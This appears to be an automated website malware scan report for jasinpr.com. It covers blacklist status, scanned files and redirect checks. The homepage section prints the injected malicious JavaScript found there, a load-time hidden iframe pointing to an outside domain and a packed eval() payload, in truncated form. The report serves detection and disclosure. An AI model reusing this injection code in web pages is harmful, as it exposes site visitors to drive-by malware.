Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jasinpr.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jasinpr.com/ | 200 OK Content-Length: 35134 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://jasinpr.com/wp-content/themes/jasinpr/js/adapt.js | 200 OK Content-Length: 3473 Content-Type: application/javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 110239 Content-Type: application/javascript | clean |
http://twitter.com/javascripts/blogger.js | HTTP/1.1 301 Moved Permanently Date: Sat, 10 Jan 2015 10:55:35 UTC Location: https://twitter.com/javascripts/blogger.js Server: tsa_b Content-Length: 0 Set-Cookie: guest_id=v1%3A142088733587297673; Domain=.twitter.com; Path=/; Expires=Mon, 09-Jan-2017 10:55:35 UTC X-Connection-Hash: 7ba63c9f77fbec24dfb739ab8c27381e X-Response-Time: 2 | clean |
https://twitter.com/javascripts/blogger.js | 404 Not Found Content-Length: 4311 Content-Type: text/html | clean |
https://abs.twimg.com/errors/404-4f54405af9c0bcdecbe656ca8893f7a9.js | 200 OK Content-Length: 10803 Content-Type: application/javascript | clean |
https://twitter.com/ | 200 OK Content-Length: 58675 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/en/init.f03f55f96e27fd122dd08346c1e730a3b4d879e6.js | 200 OK Content-Length: 302394 Content-Type: application/javascript | clean |
https://twitter.com/?lang=id | 200 OK Content-Length: 59169 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/id/init.b9eba085ac3062727e74518f493ac308e94d40e3.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=msa | 200 OK Content-Length: 59336 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/msa/init.637deb8fa3f9ff7facae7c324ee2a8479ff5d87d.js | 200 OK Content-Length: 301248 Content-Type: application/javascript | clean |
https://twitter.com/?lang=cs | 200 OK Content-Length: 59582 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/cs/init.755fe71ed55d6bcc28763e0f98239cb1411761eb.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=da | 200 OK Content-Length: 58982 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/da/init.beaf89a29480d2e9f5902c9415c04c1c88778915.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jasinpr.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 10:55:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://jasinpr.com/xmlrpc.php
GET / HTTP/1.1
Host: jasinpr.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 10:55:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://jasinpr.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: jasinpr.com
Referer: http://www.google.com/search?q=jasinpr.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jasinpr.com
Referer: http://www.google.com/search?q=jasinpr.com
Result:
The result is similar to the first query. There are no suspicious redirects found.